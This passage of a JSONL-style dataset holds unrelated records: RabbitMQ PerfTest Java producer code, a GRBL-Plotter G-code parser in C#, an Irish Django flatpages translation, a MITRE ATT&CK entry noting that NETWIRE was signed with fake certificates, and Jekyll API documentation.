LOGGER.debug(\"Error in publisher\", e);\n String reason;\n if (e.getCause() instanceof InterruptedException && this.rateIndicator.getValue() != 0.0f) {\n // likely to have been interrupted while sleeping to honor rate limit\n reason = STOP_REASON_PRODUCER_THREAD_INTERRUPTED;\n } else {\n reason = STOP_REASON_ERROR_IN_PRODUCER + \" (\" + e.getMessage() + \")\";\n }\n // failing, we don't want to block the whole process, so counting down\n countDown(reason);\n throw e;\n }\n if (state.getMsgCount() >= msgLimit) {\n String reason;\n if (msgLimit == 0) {\n reason = STOP_REASON_PRODUCER_THREAD_INTERRUPTED;\n } else {\n reason = STOP_REASON_PRODUCER_MESSAGE_LIMIT;\n }\n countDown(reason);\n }\n }\n\n private void waitForOneSecond() {\n try {\n Thread.sleep(1000L);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n throw new RuntimeException(e);\n }\n }\n\n private boolean keepGoing(AgentState state) {\n return (msgLimit == 0 || state.getMsgCount() < 
msgLimit) && !Thread.interrupted();\n }\n\n public Runnable createRunnableForScheduling() {\n final AtomicBoolean initialized = new AtomicBoolean(false);\n // make the producer state thread-safe for what we use in this case\n final ProducerState state = new ProducerState(this.rateIndicator) {\n final AtomicInteger messageCount = new AtomicInteger(0);\n @Override\n protected void setMsgCount(int msgCount) {\n messageCount.set(msgCount);\n }\n @Override\n public int getMsgCount() {\n return messageCount.get();\n }\n\n @Override\n public int incrementMessageCount() {\n return messageCount.incrementAndGet();\n }\n };\n return () -> {\n if (initialized.compareAndSet(false, true)) {\n state.setLastStatsTime(System.currentTimeMillis());\n state.setMsgCount(0);\n }\n try {\n maybeHandlePublish(state);\n } catch(PerfTestException pte) {\n // failing, we don't want to block the whole process, so counting down\n countDown(pte.getMessage());\n throw pte;\n } catch (Exception e) {\n // failing, we don't want to block the whole process, so counting down\n countDown(\"Error in scheduled producer (\" + e.getMessage() + \")\");\n throw e;\n }\n };\n }\n\n public void maybeHandlePublish(AgentState state) {\n if (keepGoing(state)) {\n handlePublish(state);\n } else {\n String reason;\n if (messageLimitReached(state)) {\n reason = STOP_REASON_PRODUCER_MESSAGE_LIMIT;\n } else {\n reason = STOP_REASON_PRODUCER_THREAD_INTERRUPTED;\n }\n countDown(reason);\n }\n }\n\n private boolean messageLimitReached(AgentState state) {\n if (msgLimit == 0) {\n return false;\n } else {\n return state.getMsgCount() >= msgLimit;\n }\n }\n\n public void handlePublish(AgentState currentState) {\n if (!this.recoveryProcess.isRecoverying()) {\n try {\n maybeWaitIfTooManyOutstandingPublishConfirms();\n\n dealWithWriteOperation(() -> publish(messageBodySource.create(currentState.getMsgCount())), this.recoveryProcess);\n\n int messageCount = currentState.incrementMessageCount();\n\n commitTransactionIfNecessary(messageCount);\n stats.handleSend();\n } catch (IOException e) {\n throw new RuntimeException(e);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n throw new RuntimeException (e);\n }\n } else {\n // The connection is recovering, waiting a bit.\n // The duration is arbitrary: don't want to empty loop\n // too much and don't want to catch too late with recovery\n try {\n LOGGER.debug(\"Recovery in progress, sleeping for a sec\");\n Thread.sleep(1000L);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n }\n }\n }\n\n private void maybeWaitIfTooManyOutstandingPublishConfirms() throws InterruptedException {\n if (confirmPool != null) {\n if (confirmTimeout < 0) {\n confirmPool.acquire();\n } else {\n boolean acquired = confirmPool.tryAcquire(confirmTimeout, TimeUnit.SECONDS);\n if (!acquired) {\n // waiting for too long, broker may be gone, stopping thread\n throw new PerfTestException(\"Waiting for publisher confirms for too long\");\n }\n }\n }\n }\n\n private void commitTransactionIfNecessary(int messageCount) throws IOException {\n if (txSize != 0 && messageCount % txSize == 0) {\n dealWithWriteOperation(() -> channel.txCommit(), this.recoveryProcess);\n }\n }\n\n private void publish(MessageBodySource.MessageEnvelope messageEnvelope)\n throws IOException {\n\n AMQP.BasicProperties.Builder propertiesBuilder = new AMQP.BasicProperties.Builder();\n if (persistent) {\n propertiesBuilder.deliveryMode(2);\n }\n\n if (messageEnvelope.getContentType() != null) {\n 
propertiesBuilder.contentType(messageEnvelope.getContentType());\n }\n\n propertiesBuilder = this.propertiesBuilderProcessor.apply(propertiesBuilder);\n\n AMQP.BasicProperties messageProperties = propertiesBuilder.build();\n\n if (shouldTrackPublishConfirms) {\n if (this.timestampProvider.isTimestampInHeader()) {\n Long timestamp = (Long) messageProperties.getHeaders().get(TIMESTAMP_HEADER);\n unconfirmed.put(channel.getNextPublishSeqNo(), timestamp);\n } else {\n unconfirmed.put(channel.getNextPublishSeqNo(), messageEnvelope.getTime());\n }\n }\n channel.basicPublish(exchangeName, routingKeyGenerator.get(),\n mandatory, false,\n messageProperties,\n messageEnvelope.getBody());\n }\n\n private void countDown(String reason) {\n if (completed.compareAndSet(false, true)) {\n completionHandler.countDown(reason);\n }\n }\n\n @Override\n public void recover(TopologyRecording topologyRecording) {\n maybeResetConfirmPool();\n }\n\n private void maybeResetConfirmPool() {\n if (this.confirmPool != null) {\n // reset confirm pool. If the producer is waiting for confirms,\n // it will move on without failing because of a confirm timeout, which is good,\n // considering there has been a re-connection.\n int usedPermits = maxOutstandingConfirms - this.confirmPool.availablePermits();\n this.confirmPool.release(usedPermits);\n LOGGER.debug(\"Resetting confirm pool in producer, used permit(s) {}, now {} available\", usedPermits, this.confirmPool.availablePermits());\n }\n }\n\n /**\n * Not thread-safe (OK for non-scheduled Producer, as it runs inside the same thread).\n */\n private static class ProducerState implements AgentState {\n\n private final ValueIndicator rateIndicator;\n private long lastStatsTime;\n private int msgCount = 0;\n\n protected ProducerState(ValueIndicator rateIndicator) {\n this.rateIndicator = rateIndicator;\n }\n\n public float getRateLimit() {\n return rateIndicator.getValue();\n }\n\n public long getLastStatsTime() {\n return lastStatsTime;\n }\n\n protected void setLastStatsTime(long lastStatsTime) {\n this.lastStatsTime = lastStatsTime;\n }\n\n public int getMsgCount() {\n return msgCount;\n }\n\n protected void setMsgCount(int msgCount) {\n this.msgCount = msgCount;\n }\n\n public int incrementMessageCount() {\n return ++this.msgCount;\n }\n\n }\n\n static class CachingRoutingKeyGenerator implements Supplier {\n\n private final String [] keys;\n private int count = 0;\n\n public CachingRoutingKeyGenerator(int cacheSize) {\n if (cacheSize <= 0) {\n throw new IllegalArgumentException(String.valueOf(cacheSize));\n }\n this.keys = new String[cacheSize];\n for (int i = 0; i < cacheSize; i++) {\n this.keys[i] = UUID.randomUUID().toString();\n }\n }\n\n @Override\n public String get() {\n if (count == keys.length) {\n count = 0;\n }\n return keys[count++ % keys.length];\n }\n }\n}\n"} {"text": "\n\n\n\n\n \n \n \n \n\n"} {"text": "/* GRBL-Plotter. Another GCode sender for GRBL.\r\n This file is part of the GRBL-Plotter application.\r\n \r\n Copyright (C) 2015-2020 Sven Hasemann contact: svenhb@web.de\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n*/\r\n\r\n// 2020-01-10 line 113 set x,y,z=null\r\n\r\nusing System;\r\nusing System.Windows.Forms;\r\n\r\nnamespace GRBL_Plotter\r\n{\r\n /// \r\n /// Hold absolute work coordinate for given linenumber of GCode program\r\n /// \r\n class coordByLine\r\n { public int lineNumber; // line number in fCTBCode\r\n public int figureNumber;\r\n public xyPoint actualPos; // accumulates position\r\n public double alpha; // angle between old and this position\r\n public double distance; // distance to specific point\r\n public bool isArc;\r\n\r\n public coordByLine(int line, int figure, xyPoint p, double a, bool isarc)\r\n { lineNumber = line; figureNumber = figure; actualPos = p; alpha = a; distance = -1; isArc = isarc; }\r\n\r\n public coordByLine(int line, int figure, xyPoint p, double a, double dist)\r\n { lineNumber = line; figureNumber = figure; actualPos = p; alpha = a; distance = dist; isArc = false; }\r\n\r\n public void calcDistance(xyPoint tmp)\r\n { xyPoint delta = new xyPoint(tmp - actualPos);\r\n distance = Math.Sqrt(delta.X * delta.X + delta.Y * delta.Y);\r\n }\r\n }\r\n\r\n public struct xyzabcuvwPoint\r\n {\r\n public double X, Y, Z, A,B,C,U,V,W;\r\n public xyzabcuvwPoint(xyzPoint tmp)\r\n { X = tmp.X; Y = tmp.Y; Z = tmp.Z; A = tmp.A; B = 0;C = 0;U = 0;V = 0;W = 0; }\r\n\r\n public static explicit operator xyPoint(xyzabcuvwPoint tmp)\r\n { return new xyPoint(tmp.X,tmp.Y); }\r\n public static explicit operator xyArcPoint(xyzabcuvwPoint tmp)\r\n { return new xyArcPoint(tmp.X, tmp.Y,0 ,0 ,0); }\r\n }\r\n\r\n /// \r\n /// Hold parsed GCode line and absolute work coordinate for given linenumber of GCode program\r\n /// \r\n class gcodeByLine\r\n { // ModalGroups\r\n public int lineNumber; // line number in fCTBCode\r\n public int figureNumber;\r\n public string codeLine; // copy of original gcode line\r\n public byte motionMode; // G0,1,2,3\r\n public bool isdistanceModeG90; // G90,91\r\n public bool ismachineCoordG53; // don't apply transform to machine coordinates\r\n public bool isSubroutine;\r\n public bool isSetCoordinateSystem; // don't process x,y,z if set coordinate system\r\n\r\n public byte spindleState; // M3,4,5\r\n public byte coolantState; // M7,8,9\r\n public int spindleSpeed; // actual spindle spped\r\n public int feedRate; // actual feed rate\r\n public double? 
x, y, z, a, b, c, u, v, w, i, j; // current parameters\r\n public xyzabcuvwPoint actualPos; // accumulates position\r\n public double alpha; // angle between old and this position\r\n public double distance; // distance to specific point\r\n public string otherCode;\r\n public string info;\r\n\r\n // Trace, Debug, Info, Warn, Error, Fatal\r\n private static readonly NLog.Logger Logger = NLog.LogManager.GetCurrentClassLogger();\r\n\r\n public gcodeByLine()\r\n { resetAll(); }\r\n public gcodeByLine(gcodeByLine tmp)\r\n {\r\n resetAll();\r\n lineNumber = tmp.lineNumber; figureNumber = tmp.figureNumber; codeLine = tmp.codeLine;\r\n motionMode = tmp.motionMode; isdistanceModeG90 = tmp.isdistanceModeG90; ismachineCoordG53 = tmp.ismachineCoordG53;\r\n isSubroutine = tmp.isSubroutine; spindleState = tmp.spindleState; coolantState = tmp.coolantState;\r\n spindleSpeed = tmp.spindleSpeed; feedRate = tmp.feedRate;\r\n x = tmp.x; y = tmp.y; z = tmp.z; i = tmp.i; j = tmp.j; a = tmp.a; b = tmp.b; c = tmp.c; u = tmp.u; v = tmp.v; w = tmp.w;\r\n actualPos = tmp.actualPos; distance = tmp.distance; alpha = tmp.alpha;\r\n isSetCoordinateSystem = tmp.isSetCoordinateSystem; otherCode = tmp.otherCode;\r\n }\r\n\r\n public string listData()\r\n { return string.Format(\"{0} mode {1} figure {2}\\r\", lineNumber, motionMode, figureNumber); }\r\n\r\n /// \r\n /// Reset coordinates and set G90, M5, M9\r\n /// \r\n public void resetAll()\r\n {\r\n lineNumber = 0; figureNumber = 0; codeLine = \"\";\r\n motionMode = 0; isdistanceModeG90 = true; ismachineCoordG53 = false; isSubroutine = false;\r\n isSetCoordinateSystem = false; spindleState = 5; coolantState = 9; spindleSpeed = 0; feedRate = 0;\r\n\r\n actualPos.X = 0; actualPos.Y = 0; actualPos.Z = 0; actualPos.A = 0; actualPos.B = 0; actualPos.C = 0;\r\n actualPos.U = 0; actualPos.V = 0; actualPos.W = 0;\r\n distance = -1; otherCode = \"\"; info = \"\"; alpha = 0;\r\n\r\n x = y = z = a = b = c = u = v = w = i = j = null;\r\n \r\n resetCoordinates();\r\n }\r\n public void resetAll(xyzPoint tmp)\r\n { resetAll();\r\n actualPos = new xyzabcuvwPoint( tmp);\r\n }\r\n /// \r\n /// Reset coordinates\r\n /// \r\n public void resetCoordinates()\r\n { x = null; y = null; z = null; a = null; b = null; c = null; u = null; v = null; w = null; i = null; j = null;\r\n }\r\n public void presetParsing(int lineNr, string line)\r\n { resetCoordinates();\r\n ismachineCoordG53 = false; isSubroutine = false;\r\n otherCode = \"\";\r\n lineNumber = lineNr;\r\n codeLine = line;\r\n }\r\n\r\n /// \r\n /// parse gcode line\r\n /// \r\n public void parseLine(int lineNr, string line, ref modalGroup modalState)\r\n {\r\n presetParsing(lineNr,line);\r\n char cmd = '\\0';\r\n string num = \"\";\r\n bool comment = false;\r\n double value = 0;\r\n line = line.ToUpper().Trim(); // 2020-07-26\r\n isSetCoordinateSystem = false;\r\n #region parse\r\n if ((!(line.StartsWith(\"$\") || line.StartsWith(\"(\"))) && (line.Length > 1))//do not parse grbl comments\r\n {\r\n try\r\n {\r\n foreach (char c in line)\r\n {\r\n if (c == ';') // comment?\r\n break;\r\n if (c == '(') // comment starts\r\n { comment = true; }\r\n if (!comment)\r\n {\r\n if (Char.IsLetter(c)) // if char is letter\r\n {\r\n if (cmd != '\\0') // and command is set\r\n {\r\n if (double.TryParse(num, System.Globalization.NumberStyles.Float, System.Globalization.NumberFormatInfo.InvariantInfo, out value))\r\n parseGCodeToken(cmd, value, ref modalState);\r\n }\r\n cmd = c; // char is a command\r\n num = \"\";\r\n }\r\n else if (Char.IsNumber(c) 
|| c == '.' || c == '-') // char is not letter but number\r\n {\r\n num += c;\r\n }\r\n }\r\n\r\n if (c == ')') // comment ends\r\n { comment = false; }\r\n }\r\n if (cmd != '\\0') // finally after for-each process final command and number\r\n {\r\n if (double.TryParse(num, System.Globalization.NumberStyles.Float, System.Globalization.NumberFormatInfo.InvariantInfo, out value))\r\n parseGCodeToken(cmd, value, ref modalState);\r\n }\r\n }\r\n catch (Exception er) { Logger.Error(er, \"parseLine\"); }\r\n }\r\n #endregion\r\n if (isSetCoordinateSystem)\r\n resetCoordinates();\r\n }\r\n\r\n /// \r\n /// fill current gcode line structure\r\n /// \r\n private void parseGCodeToken(char cmd, double value, ref modalGroup modalState)\r\n {\r\n switch (Char.ToUpper(cmd))\r\n {\r\n case 'X':\r\n x = value;\r\n break;\r\n case 'Y':\r\n y = value;\r\n break;\r\n case 'Z':\r\n z = value;\r\n break;\r\n case 'A':\r\n a = value;\r\n break;\r\n case 'B':\r\n b = value;\r\n break;\r\n case 'C':\r\n c = value;\r\n break;\r\n case 'U':\r\n u = value;\r\n break;\r\n case 'V':\r\n v = value;\r\n break;\r\n case 'W':\r\n w = value;\r\n break;\r\n case 'I':\r\n i = value;\r\n break;\r\n case 'J':\r\n j = value;\r\n break;\r\n case 'F':\r\n modalState.feedRate = feedRate = (int)value;\r\n break;\r\n case 'S':\r\n modalState.spindleSpeed = spindleSpeed = (int)value;\r\n break;\r\n case 'G':\r\n if (value <= 3) // Motion Mode 0-3 c\r\n { modalState.motionMode = motionMode = (byte)value;\r\n if (value >= 2)\r\n modalState.containsG2G3 = true;\r\n }\r\n else\r\n { otherCode += \"G\"+((int)value).ToString()+\" \";\r\n }\r\n\r\n if (value == 10)\r\n { isSetCoordinateSystem = true; }\r\n\r\n else if ((value == 20) || (value == 21)) // Units Mode\r\n { modalState.unitsMode = (byte)value; }\r\n\r\n else if (value == 53) // move in machine coord.\r\n { ismachineCoordG53 = true; }\r\n\r\n else if ((value >= 54) && (value <= 59)) // Coordinate System Select\r\n { modalState.coordinateSystem = (byte)value; }\r\n\r\n else if (value == 90) // Distance Mode\r\n { modalState.distanceMode = (byte)value; modalState.isdistanceModeG90 = true; }\r\n else if (value == 91)\r\n { modalState.distanceMode = (byte)value; modalState.isdistanceModeG90 = false;\r\n modalState.containsG91 = true;\r\n }\r\n else if ((value == 93) || (value == 94)) // Feed Rate Mode\r\n { modalState.feedRateMode = (byte)value; }\r\n break;\r\n case 'M':\r\n if ((value < 3) || (value == 30)) // Program Mode 0, 1 ,2 ,30\r\n { modalState.programMode = (byte)value; }\r\n else if (value >= 3 && value <= 5) // Spindle State\r\n { modalState.spindleState = spindleState = (byte)value; }\r\n else if (value >= 7 && value <= 9) // Coolant State\r\n { modalState.coolantState = coolantState = (byte)value; }\r\n modalState.mWord = (byte)value;\r\n if ((value < 3) || (value > 9))\r\n otherCode += \"M\" + ((int)value).ToString() + \" \";\r\n break;\r\n case 'T':\r\n modalState.tool = (byte)value;\r\n otherCode += \"T\" + ((int)value).ToString() + \" \";\r\n break;\r\n case 'P':\r\n modalState.pWord = (int)value;\r\n otherCode += \"P\" + value.ToString() + \" \";\r\n break;\r\n case 'O':\r\n modalState.oWord = (int)value;\r\n break;\r\n case 'L':\r\n modalState.lWord = (int)value;\r\n break;\r\n }\r\n isdistanceModeG90 = modalState.isdistanceModeG90;\r\n }\r\n };\r\n\r\n class modalGroup\r\n {\r\n public byte motionMode; // G0, G1, G2, G3, //G38.2, G38.3, G38.4, G38.5, G80\r\n public byte coordinateSystem; // G54, G55, G56, G57, G58, G59\r\n public byte planeSelect; // G17, G18, 
G19\r\n public byte distanceMode; // G90, G91\r\n public byte feedRateMode; // G93, G94\r\n public byte unitsMode; // G20, G21\r\n public byte programMode; // M0, M1, M2, M30\r\n public byte spindleState; // M3, M4, M5\r\n public byte coolantState; // M7, M8, M9\r\n public byte tool; // T\r\n public int spindleSpeed; // S\r\n public int feedRate; // F\r\n public int mWord;\r\n public int pWord;\r\n public int oWord;\r\n public int lWord;\r\n public bool containsG2G3;\r\n public bool ismachineCoordG53;\r\n public bool isdistanceModeG90;\r\n public bool containsG91;\r\n\r\n public modalGroup() // reset state\r\n { reset(); }\r\n\r\n public void reset()\r\n { motionMode = 0; // G0, G1, G2, G3, G38.2, G38.3, G38.4, G38.5, G80\r\n coordinateSystem = 54; // G54, G55, G56, G57, G58, G59\r\n planeSelect = 17; // G17, G18, G19\r\n distanceMode = 90; // G90, G91\r\n feedRateMode = 94; // G93, G94\r\n unitsMode = 21; // G20, G21\r\n programMode = 0; // M0, M1, M2, M30\r\n spindleState = 5; // M3, M4, M5\r\n coolantState = 9; // M7, M8, M9\r\n tool = 0; // T\r\n spindleSpeed = 0; // S\r\n feedRate = 0; // F\r\n mWord = 0;\r\n pWord = 0;\r\n oWord = 0;\r\n lWord = 1;\r\n containsG2G3 = false;\r\n ismachineCoordG53 = false;\r\n isdistanceModeG90 = true;\r\n containsG91 = false;\r\n }\r\n public void resetSubroutine()\r\n { mWord = 0;\r\n pWord = 0;\r\n oWord = 0;\r\n lWord = 1;\r\n }\r\n }\r\n\r\n struct ArcProperties\r\n { public double angleStart, angleEnd, angleDiff, radius;\r\n public xyPoint center;\r\n };\r\n\r\n class gcodeMath\r\n { private static double precision = 0.00001;\r\n\r\n public static bool isEqual(System.Windows.Point a, System.Windows.Point b)\r\n { return ((Math.Abs(a.X - b.X) < precision) && (Math.Abs(a.Y - b.Y) < precision)); }\r\n public static bool isEqual(xyPoint a, xyPoint b)\r\n { return ((Math.Abs(a.X - b.X) < precision) && (Math.Abs(a.Y - b.Y) < precision)); }\r\n\r\n public static double distancePointToPoint(System.Windows.Point a, System.Windows.Point b)\r\n { return Math.Sqrt(((a.X - b.X) * (a.X - b.X)) + ((a.Y - b.Y) * (a.Y - b.Y))); }\r\n\r\n public static ArcProperties getArcMoveProperties(System.Windows.Point pOld, System.Windows.Point pNew, System.Windows.Point centerIJ, bool isG2)\r\n { return getArcMoveProperties(new xyPoint(pOld), new xyPoint(pNew), centerIJ.X, centerIJ.Y, isG2); }\r\n public static ArcProperties getArcMoveProperties(xyPoint pOld, xyPoint pNew, xyPoint center, bool isG2)\r\n { return getArcMoveProperties(pOld, pNew, pOld.X - center.X, pOld.Y - center.Y, isG2);}\r\n\r\n public static ArcProperties getArcMoveProperties(xyPoint pOld, xyPoint pNew, double? I, double? J, bool isG2)\r\n {\r\n ArcProperties tmp = getArcMoveAngle(pOld, pNew, I, J);\r\n if (!isG2) { tmp.angleDiff = Math.Abs(tmp.angleEnd - tmp.angleStart + 2 * Math.PI); }\r\n if (tmp.angleDiff > (2 * Math.PI)) { tmp.angleDiff -= (2 * Math.PI); }\r\n if (tmp.angleDiff < (-2 * Math.PI)) { tmp.angleDiff += (2 * Math.PI); }\r\n\r\n if ((pOld.X == pNew.X) && (pOld.Y == pNew.Y))\r\n { if (isG2) { tmp.angleDiff = -2 * Math.PI; }\r\n else { tmp.angleDiff = 2 * Math.PI; }\r\n }\r\n return tmp;\r\n }\r\n\r\n public static ArcProperties getArcMoveAngle(xyPoint pOld, xyPoint pNew, double? I, double? 
J)\r\n {\r\n ArcProperties tmp;\r\n\t\t\tif (I==null) {I=0;}\r\n\t\t\tif (J==null) {J=0;}\r\n double i = (double)I;\r\n double j = (double)J;\r\n tmp.radius = Math.Sqrt(i * i + j * j); // get radius of circle\r\n tmp.center.X = pOld.X + i;\r\n tmp.center.Y = pOld.Y + j;\r\n tmp.angleStart = tmp.angleEnd = tmp.angleDiff = 0;\r\n if (tmp.radius == 0)\r\n return tmp;\r\n\r\n double cos1 = i / tmp.radius;\r\n if (cos1 > 1) cos1 = 1;\r\n if (cos1 < -1) cos1 = -1;\r\n tmp.angleStart = Math.PI - Math.Acos(cos1);\r\n if (j > 0) { tmp.angleStart = -tmp.angleStart; }\r\n\r\n double cos2 = (tmp.center.X - pNew.X) / tmp.radius;\r\n if (cos2 > 1) cos2 = 1;\r\n if (cos2 < -1) cos2 = -1;\r\n tmp.angleEnd = Math.PI - Math.Acos(cos2);\r\n if ((tmp.center.Y - pNew.Y) > 0) { tmp.angleEnd = -tmp.angleEnd; }\r\n\r\n tmp.angleDiff = tmp.angleEnd - tmp.angleStart - 2 * Math.PI;\r\n return tmp;\r\n }\r\n\r\n public static double getAlpha(System.Windows.Point pOld, double P2x, double P2y)\r\n { return getAlpha(pOld.X, pOld.Y, P2x, P2y); }\r\n public static double getAlpha(System.Windows.Point pOld, System.Windows.Point pNew)\r\n { return getAlpha(pOld.X, pOld.Y, pNew.X, pNew.Y); }\r\n public static double getAlpha(xyPoint pOld, xyPoint pNew)\r\n { return getAlpha(pOld.X, pOld.Y, pNew.X, pNew.Y); }\r\n public static double getAlpha(double P1x, double P1y, double P2x, double P2y)\r\n {\r\n double s = 1, a = 0;\r\n double dx = P2x - P1x;\r\n double dy = P2y - P1y;\r\n if (dx == 0)\r\n {\r\n if (dy > 0)\r\n a = Math.PI / 2;\r\n else\r\n a = 3 * Math.PI / 2;\r\n if (dy == 0)\r\n return 0;\r\n }\r\n else if (dy == 0)\r\n {\r\n if (dx > 0)\r\n a = 0;\r\n else\r\n a = Math.PI;\r\n if (dx == 0)\r\n return 0;\r\n }\r\n else\r\n {\r\n s = dy / dx;\r\n a = Math.Atan(s);\r\n if (dx < 0)\r\n a += Math.PI;\r\n }\r\n return a;\r\n }\r\n\r\n public static double cutAngle=0, cutAngleLast=0, angleOffset = 0;\r\n public static void resetAngles()\r\n { angleOffset = cutAngle = cutAngleLast = 0.0; }\r\n public static double getAngle(System.Windows.Point a, System.Windows.Point b, double offset, int dir)\r\n { return monitorAngle(getAlpha(a, b) + offset, dir); }\r\n private static double monitorAngle(double angle, int direction)\t\t// take care of G2 cw G3 ccw direction\r\n { double diff = angle - cutAngleLast + angleOffset;\r\n if (direction == 2)\r\n { if (diff > 0) { angleOffset -= 2 * Math.PI; } } // clock wise, more negative\r\n else if (direction == 3)\r\n { if (diff < 0) { angleOffset += 2 * Math.PI; } } // counter clock wise, more positive\r\n else\r\n { if (diff > Math.PI)\r\n angleOffset -= 2 * Math.PI;\r\n if (diff < -Math.PI)\r\n angleOffset += 2 * Math.PI;\r\n }\r\n angle += angleOffset;\r\n return angle;\r\n }\r\n }\r\n}\r\n"} {"text": "# This file is distributed under the same license as the Django package.\n#\n# Translators:\n# Jannis Leidel , 2011.\n# Michael Thornhill , 2011, 2012.\nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Django\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2012-03-23 02:37+0100\\n\"\n\"PO-Revision-Date: 2012-03-16 12:20+0000\\n\"\n\"Last-Translator: Michael Thornhill \\n\"\n\"Language-Team: Irish (http://www.transifex.net/projects/p/django/language/\"\n\"ga/)\\n\"\n\"Language: ga\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n\"Plural-Forms: nplurals=5; plural=(n==1 ? 0 : n==2 ? 1 : n<7 ? 2 : n<11 ? 
3 : \"\n\"4)\\n\"\n\n#: admin.py:10\nmsgid \"Advanced options\"\nmsgstr \"Ard-rogha\"\n\n#: forms.py:7 models.py:7\nmsgid \"URL\"\nmsgstr \"URL\"\n\n#: forms.py:8\nmsgid \"\"\n\"Example: '/about/contact/'. Make sure to have leading and trailing slashes.\"\nmsgstr \"\"\n\"Sampla '/about/contact/' Déan cinnte go bhfuil príomhslaid agus cúlslais \"\n\"agat.\"\n\n#: forms.py:10\nmsgid \"\"\n\"This value must contain only letters, numbers, dots, underscores, dashes, \"\n\"slashes or tildes.\"\nmsgstr \"\"\n\"Ní mór an luach a bhfuil ach litreacha, uimhreacha, poncanna, béim, dashes, \"\n\"slaiseanna nó thilde.\"\n\n#: forms.py:19\nmsgid \"URL is missing a leading slash.\"\nmsgstr \"Tá slais tosaigh in easnamh ag an URL.\"\n\n#: forms.py:23\nmsgid \"URL is missing a trailing slash.\"\nmsgstr \"Tá slais deireanach in easnamh ag an URL.\"\n\n#: forms.py:38\n#, python-format\nmsgid \"Flatpage with url %(url)s already exists for site %(site)s\"\nmsgstr \"Tá flatpage le url %(url)s ann cheana le suíomh %(site)s.\"\n\n#: models.py:8\nmsgid \"title\"\nmsgstr \"teideal\"\n\n#: models.py:9\nmsgid \"content\"\nmsgstr \"inneachar\"\n\n#: models.py:10\nmsgid \"enable comments\"\nmsgstr \"Cuir nótaí tráchta ar chumas\"\n\n#: models.py:11\nmsgid \"template name\"\nmsgstr \"ainm an teimpléid\"\n\n#: models.py:12\nmsgid \"\"\n\"Example: 'flatpages/contact_page.html'. If this isn't provided, the system \"\n\"will use 'flatpages/default.html'.\"\nmsgstr \"\"\n\"Sampla: 'flatpages/contact_page.html'. Muna bhfuil sé ar soláthair, bainfidh \"\n\"an córás úsáid as 'flatpages/default.html'.\"\n\n#: models.py:13\nmsgid \"registration required\"\nmsgstr \"clárúchán riachtanach\"\n\n#: models.py:13\nmsgid \"If this is checked, only logged-in users will be able to view the page.\"\nmsgstr \"\"\n\"Dá mbéadh é seo seicailte, ní beidh ach úsáideora logáilte isteach in ann an \"\n\"leathanach seo a fheiceail\"\n\n#: models.py:18\nmsgid \"flat page\"\nmsgstr \"leacleathanach\"\n\n#: models.py:19\nmsgid \"flat pages\"\nmsgstr \"leacleathanaigh\"\n"} {"text": "{\n \"type\": \"bundle\",\n \"id\": \"bundle--9b0f5428-a895-4ac3-bde7-4ee10acb8bd9\",\n \"spec_version\": \"2.0\",\n \"objects\": [\n {\n \"id\": \"relationship--add09428-6eda-4cb2-8817-008038ed4f00\",\n \"created_by_ref\": \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\",\n \"description\": \"The [NETWIRE](https://attack.mitre.org/software/S0198) client has been signed by fake and invalid digital certificates.(Citation: McAfee Netwire Mar 2015)\",\n \"object_marking_refs\": [\n \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\"\n ],\n \"external_references\": [\n {\n \"source_name\": \"McAfee Netwire Mar 2015\",\n \"description\": \"McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018.\",\n \"url\": \"https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/\"\n }\n ],\n \"source_ref\": \"malware--2a70812b-f1ef-44db-8578-a496a227aef2\",\n \"relationship_type\": \"uses\",\n \"target_ref\": \"attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082\",\n \"type\": \"relationship\",\n \"modified\": \"2020-03-16T17:21:37.008Z\",\n \"created\": \"2018-04-18T17:59:24.739Z\"\n }\n ]\n}"} {"text": "\n\n\n\n\n\nclass Jekyll::Tags::Link - jekyll-3.2.1 Documentation\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

class Jekyll::Tags::Link


Public Class Methods

\n\n \n
\n \n
 \n new(tag_name, relative_path, tokens)\n
\n \n\n
\n \n \n \n \n
\n Calls superclass method\n \n
\n \n\n \n
\n
# File lib/jekyll/tags/link.rb, line 10\ndef initialize(tag_name, relative_path, tokens)\n  super\n\n  @relative_path = relative_path.strip\nend
\n
\n \n
\n\n \n\n \n
\n\n \n
\n \n
 \n tag_name()\n
\n \n\n
\n \n \n \n \n\n \n
\n
# File lib/jekyll/tags/link.rb, line 5\ndef tag_name\n  self.name.split("::").last.downcase\nend
\n
\n \n
\n\n \n\n \n
\n\n \n
\n \n
\n

Public Instance Methods

\n\n \n
\n \n
 \n render(context)\n
\n \n\n
\n \n \n \n \n\n \n
\n
# File lib/jekyll/tags/link.rb, line 16\n      def render(context)\n        site = context.registers[:site]\n\n        site.docs_to_write.each do |document|\n          return document.url if document.relative_path == @relative_path\n        end\n\n        raise ArgumentError, <<eos\nCould not find document '#{@relative_path}' in tag '#{self.class.tag_name}'.\n\nMake sure the document exists and the path is correct.\neos\n      end
\n
\n \n
\n\n \n\n \n
\n\n \n
\n \n
\n\n
